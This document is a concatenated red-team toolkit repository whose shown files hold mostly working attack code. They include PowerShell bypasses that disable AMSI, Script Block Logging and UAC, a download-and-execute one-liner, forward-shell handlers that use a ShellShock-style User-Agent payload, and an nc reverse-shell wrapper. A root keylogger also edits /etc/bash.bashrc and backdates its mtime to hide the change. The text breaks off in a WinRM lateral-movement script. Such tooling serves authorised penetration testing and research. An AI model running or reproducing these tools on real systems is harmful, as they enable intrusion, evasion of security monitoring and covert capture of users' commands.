├── LICENSE ├── README.md ├── code-execution └── Invoke-Bypass.ps1 ├── credentials └── Invoke-Mimikatz.ps1 ├── detection └── Invoke-TestC2DetectionRule.ps1 ├── handlers ├── forward-shell-v2.py ├── forward-shell.py ├── mybash.sh └── nca ├── keyloggers └── prompt-command-keylogger.sh ├── lateral-movement └── winrm-fs.rb ├── persistence ├── backdoor-passwd.sh └── nohup.sh ├── privilege-escalation ├── Invoke-FileHijackCheck │ ├── Invoke-FileHijackCheck.ps1 │ └── handle.exe ├── Invoke-RunasCs.ps1 ├── JuicyPotato.ps1 └── JuicyPotato32.ps1 ├── scanners └── nmap │ ├── scan.parallel.sh │ └── scan.sh ├── shellcode └── pic.asm ├── shells ├── ConPtyShell.exe ├── Invoke-ConPtyShell.ps1 └── Invoke-ConPtyShell2.ps1 ├── situational-awareness └── procmon.sh └── stealth └── fake-argv ├── Makefile ├── bash-fake-argv.c └── fake /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2018 SnadoTeam 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 4 | 5 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 6 | 7 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 8 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # RedTeam Scripts by d0nkeys 2 | 3 | ## Categories 4 | 5 | - code-execution 6 | - credentials 7 | - detection 8 | - handlers 9 | - keyloggers 10 | - lateral-movement 11 | - persistence 12 | - privilege-escalation 13 | - scanners 14 | - shells 15 | - situational-awareness 16 | - stealth 17 | -------------------------------------------------------------------------------- /code-execution/Invoke-Bypass.ps1: -------------------------------------------------------------------------------- 1 | $id = random 2 | 3 | iex @" 4 | function Invoke-Bypass-$id-ScriptBlockLog { 5 | # cobbr's Script Block Logging bypass 6 | `$GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static'); 7 | If(`$GPF){ 8 | `$GPC=`$GPF.GetValue(`$null); 9 | If(`$GPC['ScriptB'+'lockLogging']){ 10 | `$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0; 11 | `$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0 12 | } 13 | `$val=[Collections.Generic.Dictionary[string,System.Object]]::new(); 14 | `$val.Add('EnableScriptB'+'lockLogging',0); 15 | `$val.Add('EnableScriptB'+'lockInvocationLogging',0); 16 | `$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=`$val 17 | } Else { 18 | [ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue(`$null,(New-Object Collections.Generic.HashSet[string])) 19 | } 20 | } 21 | "@; 22 | 23 | iex @" 24 | function Invoke-Bypass-$id-AMSI { 25 | # @mattifestation's AMSI bypass 26 | `$Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils'); 27 | `$Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue(`$null,`$true); 28 | } 29 | "@; 30 | 31 | iex @" 32 | function Invoke-Bypass-$id-AMSI2 { 33 | # rastamouse's AMSI bypass (Add-Type writes *.cs on disk!!) 34 | `$Ref = ( 35 | "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", 36 | "System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" 37 | ); 38 | 39 | `$Source = @" 40 | using System; 41 | using System.Runtime.InteropServices; 42 | 43 | namespace Bypass$id 44 | { 45 | public class AMSI$id 46 | { 47 | [DllImport("kernel32")] 48 | public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 49 | [DllImport("kernel32")] 50 | public static extern IntPtr LoadLibrary(string name); 51 | [DllImport("kernel32")] 52 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 53 | 54 | [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)] 55 | static extern void MoveMemory(IntPtr dest, IntPtr src, int size); 56 | 57 | public static int Disable() 58 | { 59 | string hexbuffer = "41 6d 73 69 53 63 61 6e 42 75 66 66 65 72"; 60 | string buffer=""; 61 | string[] hexbuffersplit = hexbuffer.Split(' '); 62 | foreach (String hex in hexbuffersplit) 63 | { 64 | int value = Convert.ToInt32(hex, 16); 65 | buffer+= Char.ConvertFromUtf32(value); 66 | } 67 | IntPtr Address = GetProcAddress(LoadLibrary("a"+ "msi"+ ".dl" +"l"), buffer); 68 | UIntPtr size = (UIntPtr)5; 69 | uint p = 0; 70 | VirtualProtect(Address, size, 0x40, out p); 71 | byte c1=0xB8,c2=0x80; 72 | Byte[] Patch = {c1, 0x57, 0x00, 0x07, c2, 0xC3 }; 73 | IntPtr unmanagedPointer = Marshal.AllocHGlobal(6); 74 | Marshal.Copy(Patch, 0, unmanagedPointer, 6); 75 | MoveMemory(Address, unmanagedPointer, 6); 76 | 77 | return 0; 78 | } 79 | } 80 | } 81 | `"@; 82 | 83 | Add-Type -ReferencedAssemblies `$Ref -TypeDefinition `$Source -Language CSharp; 84 | iex "[Bypass$id.AMSI$id]::Disable() | Out-Null" 85 | } 86 | "@; 87 | 88 | iex @" 89 | function Invoke-Bypass-$id-UACSilentCleanup { 90 | # (Add-Type writes *.cs on disk!!) 91 | # https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html 92 | 93 | Param( 94 | [Parameter(Mandatory=`$True,HelpMessage="Enter command to execute.")] 95 | `$Command 96 | ) 97 | 98 | `$Source = @" 99 | using System; 100 | using Microsoft.Win32; 101 | using System.Diagnostics; 102 | 103 | namespace UACBypass 104 | { 105 | public class SilentCleanup$id 106 | { 107 | public static void exec(string payload) 108 | { 109 | // Payload to be executed 110 | Console.WriteLine("[+] Starting Bypass UAC."); 111 | 112 | try 113 | { 114 | // Registry Key Modification 115 | RegistryKey key; 116 | key = Registry.CurrentUser.CreateSubKey(@"Environment"); 117 | key.SetValue("windir", "cmd.exe /c " + payload + " & ", RegistryValueKind.String); 118 | key.Close(); 119 | 120 | Console.WriteLine("[+] Enviroment Variabled %windir% Created."); 121 | } 122 | catch 123 | { 124 | Console.WriteLine("[-] Unable to Create the Enviroment Variabled %windir%."); 125 | Console.WriteLine("[-] Exit."); 126 | } 127 | 128 | //Wait 5 sec before execution 129 | Console.WriteLine("[+] Waiting 5 seconds before execution."); 130 | System.Threading.Thread.Sleep(5000); 131 | 132 | // Trigger the UAC Bypass 133 | try 134 | { 135 | ProcessStartInfo startInfo = new ProcessStartInfo(); 136 | startInfo.CreateNoWindow = true; 137 | startInfo.UseShellExecute = false; 138 | startInfo.FileName = "schtasks.exe"; 139 | startInfo.Arguments = @"/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I"; 140 | Process.Start(startInfo); 141 | 142 | Console.WriteLine("[+] UAC Bypass Application Executed."); 143 | } 144 | catch 145 | { 146 | Console.WriteLine("[-] Unable to Execute the Application schtasks.exe to perform the bypass."); 147 | } 148 | 149 | //Clean Registry 150 | DeleteKey(); 151 | 152 | Console.WriteLine("[-] Exit."); 153 | } 154 | 155 | static void DeleteKey() 156 | { 157 | //Wait 5 sec before cleaning 158 | Console.WriteLine("[+] Registry Cleaning will start in 5 seconds."); 159 | System.Threading.Thread.Sleep(5000); 160 | 161 | try 162 | { 163 | var rkey = Registry.CurrentUser.OpenSubKey(@"Environment", true); 164 | 165 | // Validate if the Key Exist 166 | if (rkey != null) 167 | { 168 | try 169 | { 170 | rkey.DeleteValue("windir"); 171 | rkey.Close(); 172 | } 173 | catch (Exception err) 174 | { 175 | Console.WriteLine(@"[-] Unable to Delete the Registry key (Environment). Error " + err.Message); 176 | } 177 | } 178 | 179 | Console.WriteLine("[+] Registry Cleaned."); 180 | } 181 | catch 182 | { 183 | Console.WriteLine("[-] Unable to Clean the Registry."); 184 | } 185 | } 186 | } 187 | } 188 | `"@; 189 | 190 | Add-Type -TypeDefinition `$Source -Language CSharp; 191 | iex "[UACBypass.SilentCleanup$id]::exec(```$Command) | Out-Null" 192 | } 193 | "@; 194 | 195 | # Usage 196 | # $browser = New-Object System.Net.WebClient; $browser.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials; iex($browser.downloadstring("https://raw.githubusercontent.com/d0nkeys/redteam/master/code-execution/Invoke"+"-"+"Bypass.ps1")); 197 | # iex "$(Get-Command 'Invoke-Bypass-*-AMSI')" 198 | # iex "$(Get-Command 'Invoke-Bypass-*-AMSI2')" 199 | # iex "$(Get-Command 'Invoke-Bypass-*-ScriptBlockLog')" 200 | # iex "$(Get-Command 'Invoke-Bypass-*-UACSilentCleanup') -Command cmd.exe" 201 | -------------------------------------------------------------------------------- /detection/Invoke-TestC2DetectionRule.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-TestC2DetectionRule() { 2 | <# 3 | 4 | .SYNOPSIS 5 | 6 | Simple function to test C2 detection rule 7 | 8 | Author: Francesco Soncina (phra) 9 | License: BSD 3-Clause 10 | 11 | .DESCRIPTION 12 | 13 | This function simply does an HTTP GET request every 10 seconds to the specified URL. 14 | 15 | .PARAMETER Url 16 | 17 | The URL to send the HTTP GET request to. 18 | 19 | .PARAMETER Seconds 20 | 21 | The seconds to wait between HTTP GET requests. 22 | 23 | .EXAMPLE 24 | 25 | Invoke-TestC2DetectionRule -Url "https://example.com/c2.php" 26 | 27 | Request https://example.com/c2.php every 10 seconds 28 | 29 | .EXAMPLE 30 | 31 | Invoke-TestC2DetectionRule -Url "https://example.com/c2.php" -Seconds 1 32 | 33 | Request https://example.com/c2.php every second 34 | 35 | .EXAMPLE 36 | 37 | $browser = New-Object System.Net.WebClient; $browser.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials; iex($browser.downloadstring("https://raw.githubusercontent.com/d0nkeys/redteam/master/detection/Invoke-TestC2DetectionRule.ps1")); Invoke-TestC2DetectionRule -Url "https://example.com/c2.php" -Seconds 1 38 | 39 | Download and execute this scripts from GitHub and request https://example.com/c2.php every second 40 | 41 | #> 42 | 43 | Param( 44 | [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 45 | [Alias('UrlPath')] 46 | [String] 47 | [ValidateNotNullOrEmpty()] 48 | $Url, 49 | 50 | [String] 51 | $Seconds = 10 52 | ) 53 | 54 | $browser = New-Object System.Net.WebClient; 55 | $browser.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials; 56 | 57 | $n = 0; 58 | 59 | echo "Requesting $($Url) every $($Seconds) seconds.." 60 | 61 | do { 62 | $browser.downloadString($Url) | Out-Null; 63 | echo "#$($n) => $($browser.downloadString($Url).Substring(0, 30))..." 64 | $n += 1; 65 | Start-Sleep -s $Seconds; 66 | } until ($False) 67 | } 68 | -------------------------------------------------------------------------------- /handlers/forward-shell-v2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # 4 | # Forward Shell Skeleton code that was used in IppSec's Stratosphere Video 5 | # -- https://www.youtube.com/watch?v=uMwcJQcUnmY 6 | # Authors: ippsec, 0xdf, lupman, phra 7 | 8 | 9 | import base64 10 | import random 11 | import sys 12 | import requests 13 | import threading 14 | import time 15 | import readline 16 | import tty 17 | import termios 18 | import subprocess 19 | 20 | 21 | def exec_com(command, timeout = 50): 22 | if timeout == 0: 23 | return subprocess.Popen(command, shell=True) 24 | return subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.read().decode().strip() 25 | 26 | class WebShell(object): 27 | 28 | # Initialize Class + Setup Shell, also configure proxy for easy history/debuging with burp 29 | def __init__(self, interval=0.1, proxies='http://127.0.0.1:8080'): 30 | self.proxies = {'http' : proxies} 31 | session = random.randrange(10000,99999) 32 | print(f"[*] Session ID: {session}") 33 | self.pwd = f'/dev/shm' 34 | self.stdin = f'{self.pwd}/input.{session}' 35 | self.stdout = f'{self.pwd}/output.{session}' 36 | self.interval = interval 37 | 38 | # set up shell 39 | print("[*] Setting up fifo shell on target") 40 | MakePwd = f"mkdir -p {self.pwd}" 41 | MakeNamedPipes = f"mkfifo {self.stdin}; /bin/sh -c '(tail -f {self.stdin} | /bin/sh 2>&1) >> {self.stdout}' &" 42 | self.RunRawCmd(MakePwd, timeout=1) 43 | self.RunRawCmd(MakeNamedPipes, timeout=0) 44 | time.sleep(self.interval) 45 | 46 | # set up read thread 47 | print("[*] Setting up read thread") 48 | self.interval = interval 49 | thread = threading.Thread(target=self.ReadThread, args=()) 50 | thread.daemon = True 51 | thread.start() 52 | 53 | # Read $session, output text to screen & wipe session 54 | def ReadThread(self): 55 | GetOutput = f"/bin/cat {self.stdout} | python -m base64" 56 | while True: 57 | result = self.RunRawCmd(GetOutput) #, proxy=None) 58 | if result: 59 | try: 60 | result = base64.b64decode(result) 61 | sys.stdout.buffer.write(result) 62 | sys.stdout.buffer.flush() 63 | ClearOutput = f': > {self.stdout}' 64 | self.RunRawCmd(ClearOutput) 65 | except Exception: 66 | pass 67 | time.sleep(self.interval) 68 | 69 | # Execute Command. 70 | def RunRawCmd(self, cmd, timeout=50, proxy=False): 71 | if proxy: 72 | proxies = self.proxies 73 | else: 74 | proxies = {} 75 | 76 | try: 77 | return exec_com(cmd, timeout) 78 | except: 79 | pass 80 | 81 | # Send b64'd command to RunRawCommand 82 | def WriteCmd(self, cmd): 83 | b64cmd = base64.b64encode('{}\n'.format(cmd.rstrip()).encode('utf-8')).decode('utf-8') 84 | stage_cmd = f"echo {b64cmd} | python3 -m base64 -d >> {self.stdin} &" 85 | self.RunRawCmd(stage_cmd) 86 | time.sleep(self.interval * 1.5) 87 | 88 | def WriteSingleCmd(self, cmd): 89 | b64cmd = base64.b64encode(cmd).decode() 90 | stage_cmd = f"echo -n '{b64cmd}' | python3 -m base64 -d >> {self.stdin} &" 91 | self.RunRawCmd(stage_cmd) 92 | time.sleep(self.interval * 1.5) 93 | 94 | def UpgradeShell(self): 95 | # upgrade shell 96 | UpgradeShell = """python3 -c 'import pty; pty.spawn("bash")'""" 97 | self.WriteCmd(UpgradeShell) 98 | 99 | def UpgradeShellTTY(self): 100 | rows, cols = subprocess.check_output(['stty', 'size']).decode().split() 101 | UpgradeShell = f"reset; export SHELL=bash; export TERM=xterm-256color; stty rows {rows} cols {cols}" 102 | self.WriteCmd(UpgradeShell) 103 | 104 | user = exec_com('whoami') 105 | host = exec_com('hostname -s') 106 | cds = '' 107 | isTTY = False 108 | prompt = '' 109 | stdin = sys.stdin.fileno() 110 | stdout = sys.stdout.fileno() 111 | old_settings_stdin = termios.tcgetattr(stdin) 112 | old_settings_stdout = termios.tcgetattr(stdout) 113 | 114 | S = WebShell() 115 | while True: 116 | if not isTTY: 117 | pwd = exec_com(cds + 'pwd') 118 | prompt = f'{user}@{host}:{pwd}$ ' 119 | else: 120 | prompt = '' 121 | 122 | cmd = input(prompt) 123 | if cmd.startswith('cd'): 124 | cds += cmd + ';' 125 | 126 | if cmd == "upgrade": 127 | isTTY = True 128 | S.UpgradeShell() 129 | tty.setraw(stdin) 130 | tty.setraw(stdout) 131 | S.UpgradeShellTTY() 132 | while True: 133 | c = sys.stdin.buffer.raw.read(1) 134 | sys.stdin.flush() 135 | S.WriteSingleCmd(c) 136 | if int(c[0]) == 4: 137 | S.WriteCmd(f"rm -rf {S.pwd}; exit") 138 | termios.tcsetattr(stdin, termios.TCSADRAIN, old_settings_stdin) 139 | termios.tcsetattr(stdout, termios.TCSADRAIN, old_settings_stdout) 140 | sys.exit(0) 141 | elif cmd == "exit": 142 | S.WriteCmd(f"rm -rf {S.pwd}; exit") 143 | sys.exit(0) 144 | elif cmd.startswith(":upload "): 145 | splitted = cmd.split(" ") 146 | if len(splitted) < 2: 147 | print("[?] :upload [dst]") 148 | else: 149 | src = splitted[1] 150 | dst = splitted[2] if len(splitted)>2 else splitted[1].split('/')[-1] 151 | fd = open(src, 'rb') 152 | while True: 153 | data = fd.read(1024) 154 | if not data: 155 | break 156 | datab64 = base64.b64encode(data).decode() 157 | S.WriteCmd(f"echo -n {datab64} | python -m base64 -d >> {dst}") 158 | print(f"[?] Uploading: {src} -> {dst}") 159 | print(f"[+] Uploaded: {src} -> {dst}") 160 | elif cmd.startswith(":download "): 161 | splitted = cmd.split(" ") 162 | if len(splitted) < 2: 163 | print("[?] :download [dst]") 164 | else: 165 | src = splitted[1] 166 | dst = splitted[2] if len(splitted)>2 else splitted[1].split('/')[-1] 167 | i = 0 168 | fd = open(dst, 'wb', buffering=0) 169 | while True: 170 | datab64 = exec_com(f"dd skip={i*1024} count=1024 if={src} bs=1 status=none | python -m base64") 171 | if not datab64: 172 | break 173 | data = base64.b64decode(datab64) 174 | fd.write(data) 175 | i += 1 176 | print(f"[?] Downloading: {src} -> {dst}") 177 | print(f"[+] Downloaded: {src} -> {dst}") 178 | else: 179 | S.WriteCmd(cmd) 180 | -------------------------------------------------------------------------------- /handlers/forward-shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # 4 | # Forward Shell Skeleton code that was used in IppSec's Stratosphere Video 5 | # -- https://www.youtube.com/watch?v=uMwcJQcUnmY 6 | # Authors: ippsec, 0xdf 7 | 8 | 9 | import base64 10 | import random 11 | import requests 12 | import threading 13 | import time 14 | 15 | class WebShell(object): 16 | 17 | # Initialize Class + Setup Shell, also configure proxy for easy history/debuging with burp 18 | def __init__(self, interval=1.3, proxies='http://127.0.0.1:8080'): 19 | # MODIFY THIS, URL 20 | self.url = r"http://10.10.10.56/cgi-bin/cat" 21 | self.proxies = {'http' : proxies} 22 | session = random.randrange(10000,99999) 23 | print(f"[*] Session ID: {session}") 24 | self.stdin = f'/dev/shm/input.{session}' 25 | self.stdout = f'/dev/shm/output.{session}' 26 | self.interval = interval 27 | 28 | # set up shell 29 | print("[*] Setting up fifo shell on target") 30 | MakeNamedPipes = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}" 31 | self.RunRawCmd(MakeNamedPipes, timeout=0.1) 32 | 33 | # set up read thread 34 | print("[*] Setting up read thread") 35 | self.interval = interval 36 | thread = threading.Thread(target=self.ReadThread, args=()) 37 | thread.daemon = True 38 | thread.start() 39 | 40 | # Read $session, output text to screen & wipe session 41 | def ReadThread(self): 42 | GetOutput = f"/bin/cat {self.stdout}" 43 | while True: 44 | result = self.RunRawCmd(GetOutput) #, proxy=None) 45 | if result: 46 | print(result) 47 | ClearOutput = f'echo -n "" > {self.stdout}' 48 | self.RunRawCmd(ClearOutput) 49 | time.sleep(self.interval) 50 | 51 | # Execute Command. 52 | def RunRawCmd(self, cmd, timeout=50, proxy="http://127.0.0.1:8080"): 53 | #print(f"Going to run cmd: {cmd}") 54 | # MODIFY THIS: This is where your payload code goes 55 | payload += cmd 56 | 57 | if proxy: 58 | proxies = self.proxies 59 | else: 60 | proxies = {} 61 | 62 | # MODIFY THIS: Payload in User-Agent because it was used in ShellShock 63 | headers = {'User-Agent': payload} 64 | try: 65 | r = requests.get(self.url, headers=headers, proxies=proxies, timeout=timeout) 66 | return r.text 67 | except: 68 | pass 69 | 70 | # Send b64'd command to RunRawCommand 71 | def WriteCmd(self, cmd): 72 | b64cmd = base64.b64encode('{}\n'.format(cmd.rstrip()).encode('utf-8')).decode('utf-8') 73 | stage_cmd = f'echo {b64cmd} | base64 -d > {self.stdin}' 74 | self.RunRawCmd(stage_cmd) 75 | time.sleep(self.interval * 1.1) 76 | 77 | def UpgradeShell(self): 78 | # upgrade shell 79 | UpgradeShell = """python3 -c 'import pty; pty.spawn("/bin/bash")'""" 80 | self.WriteCmd(UpgradeShell) 81 | 82 | prompt = "Please Subscribe> " 83 | S = WebShell() 84 | while True: 85 | cmd = input(prompt) 86 | if cmd == "upgrade": 87 | prompt = "" 88 | S.UpgradeShell() 89 | else: 90 | S.WriteCmd(cmd) 91 | -------------------------------------------------------------------------------- /handlers/mybash.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | unset HISTFILE 4 | 5 | # FUNCTIONS 6 | 7 | nscan () { 8 | [[ $# -ne 1 ]] && echo "No IP address provided" && return 1 9 | 10 | for i in {1..65535} ; do 11 | SERVER="$1" 12 | PORT=$i 13 | (echo > /dev/tcp/$SERVER/$PORT) >& /dev/null && 14 | echo "Port $PORT seems to be open" 15 | done 16 | } 17 | 18 | # ALIASES 19 | 20 | alias ..="cd .." 21 | alias ls="ls -liahF --color=always" 22 | alias l="ls" 23 | alias less="less -R" 24 | 25 | # MISC 26 | 27 | export PS1='\[\033[36m\][\D{%T}] \[\e[01;32m\]\u@\h\[\e[01;31m\] \w \[\e[01;39m\]\$\[\e[00m\] ' 28 | -------------------------------------------------------------------------------- /handlers/nca: -------------------------------------------------------------------------------- 1 | #!/usr/bin/expect 2 | # nca - nc wrapper by Donkeys team 3 | # Requires: expect, nc and optionally tmux 4 | 5 | set LISTEN false 6 | set ADDR "0.0.0.0" 7 | set PORT 0 8 | set TMUX false 9 | set UDP "" 10 | set KILL true 11 | 12 | set argsCount [llength $argv]; 13 | set i 0 14 | while { $i < $argsCount } { 15 | switch [lindex $argv $i] { 16 | "-l" { 17 | set LISTEN true 18 | } 19 | "-u" { 20 | set UDP "-u" 21 | } 22 | "-t" { 23 | set TMUX true 24 | } 25 | "-k" { 26 | set KILL false 27 | } 28 | default { 29 | if { $i == $argsCount-2 } { 30 | set ADDR [lindex $argv $i] 31 | } else { 32 | set PORT [lindex $argv $i] 33 | } 34 | } 35 | } 36 | set i [expr $i+1]; 37 | } 38 | 39 | if { $PORT > 0 && ($LISTEN == true || $ADDR != "0.0.0.0") } { 40 | 41 | if { $LISTEN == true } { 42 | if { $ADDR == "0.0.0.0" } { 43 | set CMD "(nc $UDP -lvp $PORT; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')" 44 | } else { 45 | set CMD "(nc $UDP -lvp $PORT -s $ADDR; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')" 46 | } 47 | set MSG "\[\033\[94m*\033\[0m\] Waiting for connections on $ADDR:$PORT" 48 | set EXP "onnect" 49 | } else { 50 | set CMD "(nc -v $UDP $ADDR $PORT; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5''\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')" 51 | #set CMD "($arg3 nc -v $ADDR $PORT; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')" 52 | set MSG "\[\033\[94m*\033\[0m\] Connecting to $ADDR:$PORT" 53 | set EXP "open" 54 | } 55 | 56 | log_user 0 57 | set timeout -1 58 | 59 | spawn "/bin/bash" 60 | send "$CMD\n" 61 | puts $MSG 62 | 63 | expect { 64 | $EXP { 65 | puts "\[\033\[92m+\033\[0m\] Connected" 66 | 67 | send "echo 'un''ix'\n" 68 | #sleep 0.2 69 | sleep 1.5 70 | expect { 71 | "unix" { 72 | puts "\[\033\[92m+\033\[0m\] Unix detected" 73 | 74 | if { $LISTEN == true && $TMUX == true } { 75 | send \x1A 76 | if { $ADDR != "0.0.0.0" } { 77 | send "tmux new-window -d '$::argv0 -l -t $ADDR $PORT'\n" 78 | } else { 79 | send "tmux new-window -d '$::argv0 -l -t $PORT'\n" 80 | } 81 | send "fg\n" 82 | } 83 | } 84 | "'un''ix'" { 85 | puts "\[\033\[92m+\033\[0m\] Windows detected" 86 | 87 | if { $LISTEN == true && $TMUX == true } { 88 | send \x1A 89 | if { $ADDR != "0.0.0.0" } { 90 | send "tmux new-window -d '$::argv0 -l -t $ADDR $PORT'\n" 91 | } else { 92 | send "tmux new-window -d '$::argv0 -l -t $PORT'\n" 93 | } 94 | send "fg\n" 95 | 96 | expect ")" 97 | expect ")" 98 | expect ")" 99 | } 100 | 101 | send "\n" 102 | interact -o "\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3" return 103 | 104 | puts "" 105 | puts "\[\033\[94m*\033\[0m\] Terminated" 106 | exit 107 | } 108 | } 109 | send "unset HISTFILE\n" 110 | send "p=`which python python2 python3 python2.7 python3.5 python2.6 python3.4 python3.6 | xargs | cut -d ' ' -f 1`;if \[ ! -z \$p \]; then echo 'P''TY-OK'; \$p -c 'import pty;pty.spawn(\"/bin/bash\")'; else p=`which script | xargs | cut -d ' ' -f 1`;if \[ ! -z \$p \]; then echo 'P''TY-OK'; \$p -qc /bin/bash /dev/null; else echo 'P''TY-ERR'; fi; fi;\n" 111 | expect { 112 | "PTY-OK" { 113 | set ROWS [exec tput lines] 114 | set COLS [exec tput cols] 115 | puts "\[\033\[92m+\033\[0m\] Spawning pty" 116 | expect { 117 | "$ " { 118 | } 119 | "# " { 120 | } 121 | "% " { 122 | } 123 | } 124 | send \x1A 125 | puts "\[\033\[94m*\033\[0m\] Setting terminal" 126 | expect ":" 127 | send "stty raw -echo\n" 128 | send "fg\n" 129 | expect { 130 | "$ " { 131 | } 132 | "# " { 133 | } 134 | "% " { 135 | } 136 | } 137 | if { $KILL == true } { 138 | send "kill -s 9 `ps -fp \$PPID | awk \"/\$PPID/\"' { print \$3 } '`\n" 139 | } 140 | send "reset\n" 141 | expect { 142 | "$ " { 143 | } 144 | "# " { 145 | } 146 | "% " { 147 | } 148 | } 149 | send "id\n" 150 | expect { 151 | "Terminal type?" { 152 | send "xterm-256color\n" 153 | } 154 | "uid=" { 155 | } 156 | } 157 | send "stty rows $ROWS columns $COLS\n" 158 | send "export SHELL=bash\n" 159 | send "export TERM=xterm-256color\n" 160 | send "unset HISTFILE\n" 161 | send "clear\n" 162 | #send "uname -a; id\n" 163 | sleep 0.5 164 | interact -o "\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\n" return 165 | 166 | } 167 | "PTY-ERR" { 168 | puts "\[\033\[91m-\033\[0m\] Can't spawn pty" 169 | puts "\[\033\[92m+\033\[0m\] Interacting" 170 | send "uname -a; id\n" 171 | interact -o "\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3" return 172 | } 173 | } 174 | puts "" 175 | puts "\[\033\[94m*\033\[0m\] Terminated" 176 | } 177 | "Connection refused" { 178 | puts "\[\033\[91m-\033\[0m\] Connection refused" 179 | } 180 | "Permission denied" { 181 | puts "\[\033\[91m-\033\[0m\] Permission denied" 182 | } 183 | "forward host lookup failed" { 184 | puts "\[\033\[91m-\033\[0m\] Forward host lookup failed" 185 | } 186 | "Cannot assign requested address" { 187 | puts "\[\033\[91m-\033\[0m\] Cannot assign requested address" 188 | } 189 | "invalid port" { 190 | puts "\[\033\[91m-\033\[0m\] Invalid port" 191 | } 192 | "invalid local port" { 193 | puts "\[\033\[91m-\033\[0m\] Invalid local port" 194 | } 195 | "Address already in use" { 196 | puts "\[\033\[91m-\033\[0m\] Address already in use" 197 | } 198 | "*** buffer overflow detected ***" { 199 | puts "\[\033\[91m-\033\[0m\] *** buffer overflow detected ***" 200 | } 201 | } 202 | exit 203 | } else { 204 | puts "Usage: $::argv0 \[-l\] \[-t\] \[addr\] port" 205 | } 206 | -------------------------------------------------------------------------------- /keyloggers/prompt-command-keylogger.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | set +o history 4 | echo "[i] - history disabled.." 5 | 6 | if [[ $EUID > 0 ]]; then 7 | echo "[!] - you have to be root ¯\_(ツ)_/¯" 8 | exit 9 | fi 10 | 11 | output=${1:-"/dev/shm/.log"} 12 | mtime=`stat -c "%y" /etc/bash.bashrc` 13 | 14 | echo "[!] - /etc/bash.bashrc was modified @ ${mtime}" 15 | echo "[!] - setting up PROMPT_COMMAND keylogger.." 16 | 17 | echo "export PROMPT_COMMAND='RETRN_VAL=\$?;echo \"\$(whoami) [\$\$]: \$(history 1 | sed \"s/^[ ]*[0-9]\+[ ]*//\" ) [\$RETRN_VAL]\" >> ${output}'" >> /etc/bash.bashrc 18 | 19 | echo "[!] - restoring mtime of /etc/bash.bashrc to ${mtime}" 20 | touch -d "${mtime}" /etc/bash.bashrc 21 | 22 | echo "[!] - done, check ${output} ツ" 23 | -------------------------------------------------------------------------------- /lateral-movement/winrm-fs.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'winrm-fs' 4 | require 'tty-reader' 5 | require 'optparse' 6 | 7 | # Author: Alamot, Lupman 8 | # winrm-fs.rb -h 127.0.0.1 -u user -p password 9 | # To upload a file type: UPLOAD local_path remote_path 10 | # e.g.: PS> UPLOAD 